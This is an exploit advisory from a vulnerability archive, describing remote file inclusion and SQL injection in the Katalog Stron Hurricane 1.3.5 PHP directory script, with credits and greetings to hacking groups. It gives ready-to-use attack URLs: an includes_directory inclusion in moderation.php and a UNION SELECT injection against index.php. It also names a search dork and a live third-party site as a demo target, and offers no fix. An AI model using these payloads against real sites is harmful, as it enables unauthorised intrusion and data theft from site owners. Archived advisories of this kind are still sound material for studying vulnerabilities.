Katalog Stron Hurricane 1.3.5 Multiple Vulnerability RFI / SQL

2010-02-25 / 2010-02-26
Credit: kaMtiEz
Risk: High
Local: No
Remote: Yes
CWE: CWE-89
CWE-94

############################################################################################################# ## Katalog Stron Hurricane Multiple Vulnerability RFI / SQL ## ## Author : kaMtiEz (kamzcrew@yahoo.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : 14 February, 2010 ## ############################################################################################################# [ Software Information ] [+] Vendor : http://www.katalog.hurricane.pl/ [+] Download : http://www.katalog.hurricane.pl/download.html [+] version : 1.3.5 or lower maybe also affected [+] Vulnerability : RFI [+] Dork : "CiHuY" [+] LOCATION : INDONESIA - JOGJA ############################################################################################################# [ Here We go .. Live From Jogja City.. ] [ RFI ] http://127.0.0.1/[kaMtiEz]/includes/moderation.php?includes_directory=[INDONESIANCODER] [ BUG ] [!] moderation.php include($includes_directory.'population.php'); [ SQL ] http://127.0.0.1/[kaMtiEz]/index.php?inc=category&get=[INDONESIANCODER] [ XPL ] 6666+union+all+select+1,database(),3-- [ DEMO ] http://server/includes/moderation.php?includes_directory=[EVILc0de] http://www.bazastron.com.pl/index.php?inc=category&get=6666+union+all+select+1,database(),3-- [ FIX ] dunno :"> ############################################################################################################# [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,Ibl13Z,Milo [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk [ NOTE ] [+] Ibl13Z : Turut berduka atas Flashdisknya gan [+] Milo : Telpon MyQueen Terosss hhaa [+] r3m1ck : KAYAK KUWEK Ojo Homok Yak .. ndak baik [+] gonzhack : gua doain bro moga balikan .. hha .. [+] for some one .. one day .. u will be mind .. >.< [ QUOTE ] [+] we are NOT DEAD INDONESIANCODER STILL r0x [+] nothing secure ..

References:

http://www.exploit-db.com/exploits/11452
http://secunia.com/advisories/38581
http://packetstormsecurity.org/1002-exploits/katalog-rfisql.txt
http://osvdb.org/62340


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top